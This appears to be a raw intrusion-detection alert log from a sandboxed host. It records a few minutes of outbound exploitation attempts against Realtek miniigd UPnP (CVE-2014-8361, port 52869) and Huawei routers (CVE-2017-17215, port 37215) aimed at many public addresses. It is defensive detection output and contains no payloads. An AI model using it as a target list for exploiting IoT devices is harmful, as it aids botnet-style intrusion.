                                                07/20/24-23:05:37.476168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5205452869192.168.2.1468.10.183.207
                                                07/20/24-23:05:38.013524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4686852869192.168.2.1480.50.203.132
                                                07/20/24-23:06:02.853581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4313252869192.168.2.14147.212.209.81
                                                07/20/24-23:06:01.862638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4072052869192.168.2.14165.147.124.56
                                                07/20/24-23:06:01.813486TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5249852869192.168.2.1471.121.141.254
                                                07/20/24-23:06:56.125524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614399852869192.168.2.14212.160.189.111
                                                07/20/24-23:06:01.160489TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615625852869192.168.2.1417.214.134.177
                                                07/20/24-23:06:02.993689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23346252869192.168.2.14158.14.58.53
                                                07/20/24-23:05:56.450231TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613580252869192.168.2.14177.22.170.108
                                                07/20/24-23:05:47.477436TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614136452869192.168.2.14175.68.43.201
                                                07/20/24-23:05:58.830981TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24093052869192.168.2.14121.138.29.115
                                                07/20/24-23:05:58.195412TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614429652869192.168.2.14138.215.99.180
                                                07/20/24-23:06:29.663319TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613526452869192.168.2.1474.28.251.113
                                                07/20/24-23:06:12.943129TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25587052869192.168.2.1477.178.250.45
                                                07/20/24-23:06:04.676388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4790052869192.168.2.14131.192.122.136
                                                07/20/24-23:06:11.873559TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5555452869192.168.2.14222.169.26.29
                                                07/20/24-23:06:12.745128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4738852869192.168.2.14147.98.124.138
                                                07/20/24-23:06:27.965613TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25062852869192.168.2.14150.246.129.82
                                                07/20/24-23:05:47.415063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615277452869192.168.2.14212.222.66.158
                                                07/20/24-23:06:16.164914TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24297252869192.168.2.14195.40.20.153
                                                07/20/24-23:05:47.464031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3653852869192.168.2.14161.253.139.174
                                                07/20/24-23:05:50.571555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874437215192.168.2.14197.201.144.119
                                                07/20/24-23:06:08.034671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5916052869192.168.2.14161.14.214.31
                                                07/20/24-23:05:35.725561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5886452869192.168.2.1493.244.188.64
                                                07/20/24-23:05:37.489725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24907652869192.168.2.14202.183.171.29
                                                07/20/24-23:05:48.780090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917837215192.168.2.14157.80.152.234
                                                07/20/24-23:05:57.334876TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24365852869192.168.2.14130.184.173.39
                                                07/20/24-23:06:01.613195TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614431852869192.168.2.1471.105.97.148
                                                07/20/24-23:05:52.445659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23966052869192.168.2.1423.67.93.22
                                                07/20/24-23:05:57.114018TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25747652869192.168.2.14160.180.47.240
                                                07/20/24-23:05:47.668564TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615215852869192.168.2.1412.205.1.20
                                                07/20/24-23:06:14.422743TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613627052869192.168.2.1474.205.40.173
                                                07/20/24-23:06:38.067768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4338452869192.168.2.1457.62.122.118
                                                07/20/24-23:05:39.559457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5566452869192.168.2.1434.80.28.184
                                                07/20/24-23:05:47.137205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226837215192.168.2.1441.168.58.131
                                                07/20/24-23:05:56.424976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296837215192.168.2.14157.252.185.21
                                                07/20/24-23:05:45.439166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328637215192.168.2.14157.31.72.32
                                                07/20/24-23:05:39.047734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050237215192.168.2.1441.213.128.194
                                                07/20/24-23:06:02.066021TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5576252869192.168.2.14165.146.142.120
                                                07/20/24-23:05:48.858199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3533637215192.168.2.1441.49.32.49
                                                07/20/24-23:05:39.630378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4718852869192.168.2.14216.209.232.62
                                                07/20/24-23:05:58.972089TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26034452869192.168.2.1486.91.56.112
                                                07/20/24-23:06:33.411817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613597652869192.168.2.14169.178.252.2
                                                07/20/24-23:06:25.934160TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615907852869192.168.2.14140.104.123.65
                                                07/20/24-23:05:35.099074TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5913852869192.168.2.14145.229.168.132
                                                07/20/24-23:05:40.330485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4149652869192.168.2.1451.130.138.196
                                                07/20/24-23:06:12.761892TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613523052869192.168.2.1449.163.219.249
                                                07/20/24-23:05:56.402098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577837215192.168.2.14119.163.194.77
                                                07/20/24-23:05:57.013302TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25434652869192.168.2.14134.140.38.1
                                                07/20/24-23:06:22.097094TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614406452869192.168.2.14213.131.142.92
                                                07/20/24-23:06:34.302136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4662652869192.168.2.14112.166.149.158
                                                07/20/24-23:05:59.805275TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24291052869192.168.2.1488.73.51.55
                                                07/20/24-23:06:02.203133TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614623852869192.168.2.14205.33.171.106
                                                07/20/24-23:06:02.976833TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23329452869192.168.2.1418.150.67.241
                                                07/20/24-23:06:06.090759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4104452869192.168.2.1481.140.159.46
                                                07/20/24-23:06:06.112950TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613952052869192.168.2.1437.219.135.4
                                                07/20/24-23:05:57.507455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3411852869192.168.2.14165.228.62.149
                                                07/20/24-23:05:40.435340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4370252869192.168.2.1473.20.147.180
                                                07/20/24-23:05:39.039093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627437215192.168.2.1441.37.179.217
                                                07/20/24-23:05:58.133891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3537852869192.168.2.14153.114.31.182
                                                07/20/24-23:05:38.812461TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3945252869192.168.2.14178.152.7.43
                                                07/20/24-23:05:57.123864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23680652869192.168.2.14177.22.170.108
                                                07/20/24-23:05:57.851101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5075652869192.168.2.1460.207.166.164
                                                07/20/24-23:06:01.842190TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23821252869192.168.2.14219.82.29.79
                                                07/20/24-23:05:59.125247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4016852869192.168.2.14165.147.124.56
                                                07/20/24-23:05:37.457748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23957452869192.168.2.1425.145.229.184
                                                07/20/24-23:06:01.391419TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4595852869192.168.2.14145.133.233.116
                                                07/20/24-23:05:36.329793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500037215192.168.2.1441.74.212.1
                                                07/20/24-23:05:37.475548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4561452869192.168.2.14132.232.1.40
                                                07/20/24-23:05:57.534062TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3284252869192.168.2.14208.177.199.121
                                                07/20/24-23:05:39.765891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860237215192.168.2.1441.140.8.70
                                                07/20/24-23:06:05.086589TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24110052869192.168.2.14108.204.101.233
                                                07/20/24-23:05:38.048572TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613588252869192.168.2.14191.156.105.201
                                                07/20/24-23:05:50.524010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332637215192.168.2.1441.35.178.191
                                                07/20/24-23:06:15.084046TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6012252869192.168.2.1465.110.233.245
                                                07/20/24-23:05:48.762153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756837215192.168.2.14170.95.226.52
                                                07/20/24-23:07:06.909872TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614480252869192.168.2.14114.226.21.17
                                                07/20/24-23:05:48.780090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3982637215192.168.2.14135.231.61.219
                                                07/20/24-23:05:50.542034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051237215192.168.2.14212.54.87.240
                                                07/20/24-23:06:03.345104TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25532052869192.168.2.1479.99.137.178
                                                07/20/24-23:06:02.175839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6086052869192.168.2.14126.57.33.85
                                                07/20/24-23:05:56.446227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623037215192.168.2.1444.62.7.164
                                                07/20/24-23:06:03.046089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4195452869192.168.2.14178.124.97.10
                                                07/20/24-23:05:38.677347TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613375652869192.168.2.14114.38.170.24
                                                07/20/24-23:05:40.359038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4933052869192.168.2.1468.179.40.208
                                                07/20/24-23:05:40.471777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4821652869192.168.2.1454.177.195.84
                                                07/20/24-23:05:48.256522TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613782052869192.168.2.1420.39.144.53
                                                07/20/24-23:06:37.923474TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614540052869192.168.2.14208.254.89.177
                                                07/20/24-23:06:34.395125TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615862252869192.168.2.1460.192.242.156
                                                07/20/24-23:05:33.861759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943037215192.168.2.14197.135.151.92
                                                07/20/24-23:05:52.525575TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25581652869192.168.2.1454.172.8.61
                                                07/20/24-23:07:37.787409TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4614052869192.168.2.14210.193.226.132
                                                07/20/24-23:05:40.333807TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3448452869192.168.2.1448.151.66.255
                                                07/20/24-23:05:38.939891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189237215192.168.2.14157.188.24.214
                                                07/20/24-23:05:40.392392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24246452869192.168.2.14116.71.24.211
                                                07/20/24-23:05:57.017539TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25968852869192.168.2.14179.61.198.141
                                                07/20/24-23:05:40.416273TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5861852869192.168.2.14141.164.202.249
                                                07/20/24-23:05:52.486069TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5830052869192.168.2.148.133.12.9
                                                07/20/24-23:06:27.889934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24800052869192.168.2.14162.101.84.116
                                                07/20/24-23:05:52.494675TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23445052869192.168.2.1479.20.2.158
                                                07/20/24-23:05:56.783840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4468852869192.168.2.14140.147.162.187
                                                07/20/24-23:05:35.492617TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614824452869192.168.2.14130.207.23.122
                                                07/20/24-23:05:39.054227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203237215192.168.2.14132.98.103.26
                                                07/20/24-23:05:40.392392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5051652869192.168.2.1460.68.102.220
                                                07/20/24-23:05:39.065904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173837215192.168.2.14157.28.31.40
                                                07/20/24-23:05:34.626588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937637215192.168.2.14116.132.59.169
                                                07/20/24-23:05:35.592228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4430052869192.168.2.14147.14.244.79
                                                07/20/24-23:05:37.591367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863252869192.168.2.14189.150.109.151
                                                07/20/24-23:05:39.680161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232037215192.168.2.14197.33.215.191
                                                07/20/24-23:05:35.530121TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616045852869192.168.2.1470.127.37.49
                                                07/20/24-23:05:38.949221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146037215192.168.2.14197.41.135.240
                                                07/20/24-23:05:37.468386TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24684252869192.168.2.14153.126.184.30
                                                07/20/24-23:06:03.747455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998837215192.168.2.1441.68.205.199
                                                07/20/24-23:06:00.052134TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615644252869192.168.2.14176.101.171.67
                                                07/20/24-23:06:15.183242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3632452869192.168.2.1435.17.252.36
                                                07/20/24-23:06:12.648653TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5139852869192.168.2.14202.180.182.96
                                                07/20/24-23:06:04.927905TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23309652869192.168.2.14117.34.159.68
                                                07/20/24-23:05:47.125782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938037215192.168.2.1418.186.109.95
                                                07/20/24-23:06:03.235312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4865852869192.168.2.14161.200.183.56
                                                07/20/24-23:05:33.857328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655637215192.168.2.14152.41.190.171
                                                07/20/24-23:05:35.763759TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615230852869192.168.2.1437.150.102.99
                                                07/20/24-23:06:01.982338TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25200852869192.168.2.1468.40.46.225
                                                07/20/24-23:05:36.018251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3628052869192.168.2.1478.147.130.95
                                                07/20/24-23:05:47.101730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5888437215192.168.2.1427.195.70.80
                                                07/20/24-23:06:03.606709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3681652869192.168.2.1468.106.50.107
                                                07/20/24-23:06:27.749158TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615591652869192.168.2.1485.22.107.102
                                                07/20/24-23:05:37.556916TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25987252869192.168.2.1452.192.238.227
                                                07/20/24-23:05:53.235379TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24691452869192.168.2.14191.106.159.193
                                                07/20/24-23:05:34.652423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600837215192.168.2.14197.164.107.109
                                                07/20/24-23:05:57.186863TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614319052869192.168.2.14191.56.232.70
                                                07/20/24-23:05:42.127943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854637215192.168.2.14157.210.156.80
                                                07/20/24-23:05:58.787162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4501452869192.168.2.14170.88.190.122
                                                07/20/24-23:05:33.861088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619037215192.168.2.14157.221.39.140
                                                07/20/24-23:05:59.574335TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4633452869192.168.2.14162.186.165.69
                                                07/20/24-23:06:21.074396TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5703052869192.168.2.14216.74.70.252
                                                07/20/24-23:06:11.280683TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613995652869192.168.2.14104.173.87.251
                                                07/20/24-23:06:14.553922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3585652869192.168.2.14103.5.225.152
                                                07/20/24-23:06:06.855214TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3936852869192.168.2.1479.41.249.71
                                                07/20/24-23:05:37.895962TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4129452869192.168.2.14189.150.109.151
                                                07/20/24-23:06:08.048662TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614081852869192.168.2.14122.247.158.220
                                                07/20/24-23:06:18.694960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4471052869192.168.2.14135.207.31.104
                                                07/20/24-23:07:06.283236TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615714652869192.168.2.1482.48.155.202
                                                07/20/24-23:05:59.330840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3694252869192.168.2.14189.143.163.228
                                                07/20/24-23:05:39.916294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5707252869192.168.2.14141.164.202.249
                                                07/20/24-23:05:47.085193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772237215192.168.2.1441.243.139.160
                                                07/20/24-23:05:52.671380TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5954452869192.168.2.14154.45.85.205
                                                07/20/24-23:05:38.949221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863037215192.168.2.14157.40.150.223
                                                07/20/24-23:05:56.266001TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3976452869192.168.2.14216.188.116.154
                                                07/20/24-23:05:58.205142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5035252869192.168.2.14201.109.19.43
                                                07/20/24-23:05:58.983376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3904452869192.168.2.1498.96.42.253
                                                07/20/24-23:06:19.955933TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23798252869192.168.2.14162.188.233.6
                                                07/20/24-23:06:27.858951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4290252869192.168.2.14143.31.210.228
                                                07/20/24-23:05:38.160208TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613912252869192.168.2.14219.160.119.18
                                                07/20/24-23:05:57.653497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3336652869192.168.2.14145.135.164.39
                                                07/20/24-23:06:02.122085TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615659852869192.168.2.1497.183.170.78
                                                07/20/24-23:05:48.754228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3325237215192.168.2.1441.23.169.46
                                                07/20/24-23:06:10.418021TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23285852869192.168.2.144.21.2.155
                                                07/20/24-23:06:03.679529TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24940852869192.168.2.14171.203.207.215
                                                07/20/24-23:05:57.207276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4988852869192.168.2.14198.11.216.157
                                                07/20/24-23:05:48.762153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979037215192.168.2.14197.224.167.108
                                                07/20/24-23:06:01.884914TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4545452869192.168.2.14222.134.31.216
                                                07/20/24-23:06:03.015672TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613916452869192.168.2.14197.202.109.233
                                                07/20/24-23:05:34.622534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874437215192.168.2.1432.8.164.81
                                                07/20/24-23:06:20.738854TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614296652869192.168.2.14129.201.169.136
                                                07/20/24-23:06:17.536919TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615244852869192.168.2.14191.102.18.87
                                                07/20/24-23:05:34.660344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644437215192.168.2.1450.34.155.192
                                                07/20/24-23:06:18.534266TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613919052869192.168.2.1460.241.94.226
                                                07/20/24-23:05:33.829338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539237215192.168.2.14157.233.53.190
                                                07/20/24-23:07:11.843007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650637215192.168.2.14197.217.235.26
                                                07/20/24-23:05:45.749770TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613697452869192.168.2.14106.251.202.103
                                                07/20/24-23:05:37.987250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3452852869192.168.2.1425.203.5.43
                                                07/20/24-23:06:00.426771TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615646052869192.168.2.1463.220.62.243
                                                07/20/24-23:05:36.534811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230437215192.168.2.14157.207.127.188
                                                07/20/24-23:06:04.603267TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613466852869192.168.2.1436.152.244.206
                                                07/20/24-23:05:39.387385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613914852869192.168.2.1464.129.250.95
                                                07/20/24-23:05:33.852858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415837215192.168.2.1441.28.13.220
                                                07/20/24-23:05:34.662338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280037215192.168.2.14197.122.120.132
